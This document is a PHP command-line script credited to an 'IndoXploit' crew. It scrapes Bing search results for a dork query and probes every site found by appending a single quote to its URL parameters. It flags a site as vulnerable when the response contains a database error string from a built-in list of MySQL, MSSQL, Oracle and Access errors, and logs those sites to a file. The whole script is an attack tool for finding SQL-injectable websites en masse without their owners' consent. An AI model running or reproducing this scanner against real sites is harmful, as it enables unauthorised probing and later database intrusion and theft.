SQL Dork Scanner via Bing Dorker [ CLI ]

1. <?php
2. // SQL Scanner via Bing Dorker
3. // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit
4. // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew
5. // usage: php sql.php 'bing_dorker'
6. // ex: php sql.php '"page.php?id=1" site:it'
7.  
8. set_time_limit(0);
9. error_reporting(0);
10. @ini_set('memory_limit', '64M');
11. @header('Content-Type: text/html; charset=UTF-8');
12.  
13. function cover() {
14.     print " ******        SQL Scanner via Bing Dorker         ******\n";
15.     print " *****      Coded by l0c4lh34rtz - IndoXploit       *****\n";
16.     print " ****  Sanjungan Jiwa - Jancok Sec - Res7ock Crew    ****\n";
17.     print " ***          usage: php sql.php 'bing_dork'          ***\n";
18.     print " **    ex: php sql.php '\"page.php?id=1\" site:it'       **\n\n";
19. }
20. $error[] = 'You have an error in your SQL';
21. $error[] = 'supplied argument is not a valid MySQL result resource in';
22. $error[] = 'Division by zero in';
23. $error[] = 'Call to a member function';
24. $error[] = 'Microsoft JET Database';
25. $error[] = 'ODBC Microsoft Access Driver';
26. $error[] = 'Microsoft OLE DB Provider for SQL Server';
27. $error[] = 'Unclosed quotation mark';
28. $error[] = 'Microsoft OLE DB Provider for Oracle';
29. $error[] = 'Incorrect syntax near';
30. $error[] = 'SQL query failed';
31. $error[] = 'Warning: filesize()';
32. $error[] = 'Warning: preg_match()';
33. $error[] = 'Warning: array_merge()';
34. $error[] = 'Warning: mysql_query()';
35. $error[] = 'Warning: mysql_num_rows()';
36. $error[] = 'Warning: session_start()';
37. $error[] = 'Warning: getimagesize()';
38. $error[] = 'Warning: mysql_fetch_array()';
39. $error[] = 'Warning: mysql_fetch_assoc()';
40. $error[] = 'Warning: is_writable()';
41. $error[] = 'Warning: Unknown()';
42. $error[] = 'Warning: mysql_result()';
43. $error[] = 'Warning: pg_exec()';
44. $error[] = 'Warning: require()';
45.  
46. function getsource($url) {
47.     $curl = curl_init($url);
48.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
49.     $content = curl_exec($curl);
50.     curl_close($curl);
51.     return $content;
52. }
53. function inject($url) {
54.     $data = getsource(str_replace("=", "='", $url));
55.     $errors = implode("|", $GLOBALS['error']);
56.     return preg_match("#{$errors}#i", $data);
57. }
58. function simpen($isi) {
59.     $f = fopen("result_sql.txt","a+");
60.     fwrite($f, "$isi\n");
61.     fclose($f);
62. }
63.  
64. $do = urlencode($argv[1]);
65. if(isset($argv[1])) {
66.     cover();
67.     $npage = 1;
68.     $npages = 30000;
69.     $allLinks = array();
70.     $lll = array();
71.     while($npage <= $npages) {
72.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
73.         if($x) {
74.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
75.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
76.             $npage = $npage + 10;
77.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
78.         } else break;
79.     }
80.     foreach($allLinks as $url) {
81.         $urls = parse_url($url, PHP_URL_HOST);
82.         $urls = "http://$urls/";
83.         if($_SESSION[$urls]) {
84.             //
85.         } else {
86.             $_SESSION[$urls] = "1";
87.             if(inject($url)) {
88.                 print " $url -> Vuln!!\n";
89.                 simpen($url);
90.             }
91.         }
92.     }
93. } else {
94.     print "usage: php ".$argv[0]." 'bing_dork'\n";
95.     print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n";
96. }
97. ?>